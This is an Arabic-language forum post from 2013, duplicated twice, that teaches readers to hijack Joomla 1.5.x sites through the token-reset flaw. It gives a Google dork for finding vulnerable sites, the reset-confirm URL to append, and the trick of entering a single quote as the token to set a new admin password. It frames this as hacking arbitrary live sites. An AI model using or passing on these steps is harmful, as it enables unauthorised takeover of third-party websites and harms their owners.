ahmedfreed
03-23-2013, 03:15 AM
اقدم لكم وبين ايديكم شرح استغلال ثغره سكربت جومله
****** Joomla===========
Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability
الأصدارات المصابة 1.5.x
نوع الثغرة Remote Admin Change Password تغيير باسوورد الأدمن
هسه ندخل على التطبيق ولبحث
الدورك البحث
تدخل تفتح الكوكل صديقنا Google
وتكدب هاذا الكود الي هوه الدورك
كود PHP:
inurl:index.php?option=com_use
طلعتنه هوايه مواقع مصابه
تختار احد من هن
هسه تشوف طريقه الاستغلال الثغره بعد مالكينه الموقع المصاب
ندخل للموقع المصاب ونضيف هاذا المسار
كود PHP:
index.php?option=com_user&view=reset&layout=confirm
يصير هيجي يعني
كود PHP:
www.XXXXXX.com/index.php?option=com_user&view=reset&layout=confirm
راح يطلع مربع اسمة "token
نخلي بل مربع هاذي العلامه النقطه
'
هسه راج يطلب منك باسورد جديد
تكتب الباسورد الي تريده
وتعيد كتابته مره لخ
ومبرووك الاختراقق
خوما صعبه ااذا صعبه كلولي
نلقاكم بدرس اخررر
****** Joomla===========
Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability
الأصدارات المصابة 1.5.x
نوع الثغرة Remote Admin Change Password تغيير باسوورد الأدمن
هسه ندخل على التطبيق ولبحث
الدورك البحث
تدخل تفتح الكوكل صديقنا Google
وتكدب هاذا الكود الي هوه الدورك
كود PHP:
inurl:index.php?option=com_use
طلعتنه هوايه مواقع مصابه
تختار احد من هن
هسه تشوف طريقه الاستغلال الثغره بعد مالكينه الموقع المصاب
ندخل للموقع المصاب ونضيف هاذا المسار
كود PHP:
index.php?option=com_user&view=reset&layout=confirm
يصير هيجي يعني
كود PHP:
www.XXXXXX.com/index.php?option=com_user&view=reset&layout=confirm
راح يطلع مربع اسمة "token
نخلي بل مربع هاذي العلامه النقطه
'
هسه راج يطلب منك باسورد جديد
تكتب الباسورد الي تريده
وتعيد كتابته مره لخ
ومبرووك الاختراقق
خوما صعبه ااذا صعبه كلولي
نلقاكم بدرس اخررر